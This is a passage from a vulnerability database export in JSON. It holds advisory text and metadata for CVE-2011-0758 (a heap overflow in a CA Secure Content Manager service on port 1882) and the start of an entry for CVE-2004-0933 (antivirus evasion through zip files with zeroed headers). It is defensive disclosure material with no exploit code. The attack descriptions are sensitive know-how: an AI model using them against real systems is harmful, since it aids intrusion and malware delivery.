IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/43200/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43200\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in CA Secure Content Manager, which\ncan be exploited by malicious people to compromise a vulnerable\nsystem. \n\nThe vulnerability is caused due to missing input validation in the\neTrust Common Services Transport (ECSQdmn.exe) service when parsing\nrequests and can be exploited to cause a heap-based buffer overflow\nvia a specially crafted request sent to port 1882. \n* CA Gateway Security version 8.1. \n\nSOLUTION:\nRestrict access to the affected service. \n\nPROVIDED AND/OR DISCOVERED BY:\nSebastian Apelt via ZDI. \n\nORIGINAL ADVISORY:\nZDI:\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-059/\n\nCA:\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability\n\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-059\n\nFebruary 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca\n\n-- CVE ID:\nCVE-2011-0758\n\n-- CVSS:\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n-- Affected Vendors:\nCA\n\n-- Affected Products:\nCA eTrust Secure Content Manager\n\n-- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability. \n\n-- Disclosure Timeline:\n2008-05-23 - Vulnerability reported to vendor\n2011-02-07 - Public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by:\n * Sebastian Apelt (sebastian.apelt@siberas.de)\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. TippingPoint does not re-sell the vulnerability details or any\nexploit code. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "PACKETSTORM",
"id": "98339"
},
{
"db": "PACKETSTORM",
"id": "98243"
}
],
"trust": 2.79
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-48703",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-48703"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-0758",
"trust": 3.6
},
{
"db": "ZDI",
"id": "ZDI-11-059",
"trust": 2.6
},
{
"db": "BID",
"id": "46253",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "43200",
"trust": 1.9
},
{
"db": "VUPEN",
"id": "ADV-2011-0306",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "70840",
"trust": 1.1
},
{
"db": "SREASON",
"id": "8075",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1025052",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-342",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20110207 ZDI-11-059: CA ETRUST SECURE CONTENT MANAGER COMMON SERVICES TRANSPORT REMOTE CODE EXECUTION VULNERABILITY",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "98243",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-48703",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "98339",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "PACKETSTORM",
"id": "98339"
},
{
"db": "PACKETSTORM",
"id": "98243"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
]
},
"id": "VAR-201102-0158",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-48703"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:45:54.553000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CA20110208-01: Security Advisory for CA Secure Content Manager, Gateway Security",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7bee6f16e1-6e05-4890-a739-2b9f745c721f%7d"
},
{
"title": "CA has issued an update to correct this vulnerability.{EE6F16E1-6E05-4890-A739-2B9F745C721F}",
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid="
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-189",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca"
},
{
"trust": 1.8,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-059"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/46253"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/43200"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0306"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/516277/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7bee6f16e1-6e05-4890-a739-2b9f745c721f%7d"
},
{
"trust": 1.1,
"url": "http://osvdb.org/70840"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1025052"
},
{
"trust": 1.1,
"url": "http://securityreason.com/securityalert/8075"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0758"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-0758"
},
{
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid="
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/516277/100/0/threaded"
},
{
"trust": 0.3,
"url": " http://www.ca.com/us/products/product.aspx?id=4673"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={ee6f16e1-6e05-4890-a739-2b9f745c721f}"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/section_179/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-059/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43200"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43200/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43200/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-0758"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "PACKETSTORM",
"id": "98339"
},
{
"db": "PACKETSTORM",
"id": "98243"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "PACKETSTORM",
"id": "98339"
},
{
"db": "PACKETSTORM",
"id": "98243"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-02-07T00:00:00",
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"date": "2011-02-10T00:00:00",
"db": "VULHUB",
"id": "VHN-48703"
},
{
"date": "2011-02-07T00:00:00",
"db": "BID",
"id": "46253"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"date": "2011-02-09T09:16:47",
"db": "PACKETSTORM",
"id": "98339"
},
{
"date": "2011-02-07T20:31:00",
"db": "PACKETSTORM",
"id": "98243"
},
{
"date": "2011-02-10T18:00:59.130000",
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"date": "2011-02-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-02-07T00:00:00",
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-48703"
},
{
"date": "2011-02-07T00:00:00",
"db": "BID",
"id": "46253"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"date": "2023-11-07T02:06:52.097000",
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"date": "2011-07-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "98243"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA ETrust Secure Content Manager and CA Gateway Securit of eCS In the component Service operation interruption (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "digital error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
],
"trust": 0.6
}
}
VAR-200501-0309
Vulnerability from variot - Updated: 2023-12-18 12:40Computer Associates (CA) InoculateIT 6.0, eTrust Antivirus r6.0 through r7.1, eTrust Antivirus for the Gateway r7.0 and r7.1, eTrust Secure Content Manager, eTrust Intrusion Detection, EZ-Armor 2.0 through 2.4, and EZ-Antivirus 6.1 through 6.3 allow remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. A remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0309",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:archive_zip:archive_zip:1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
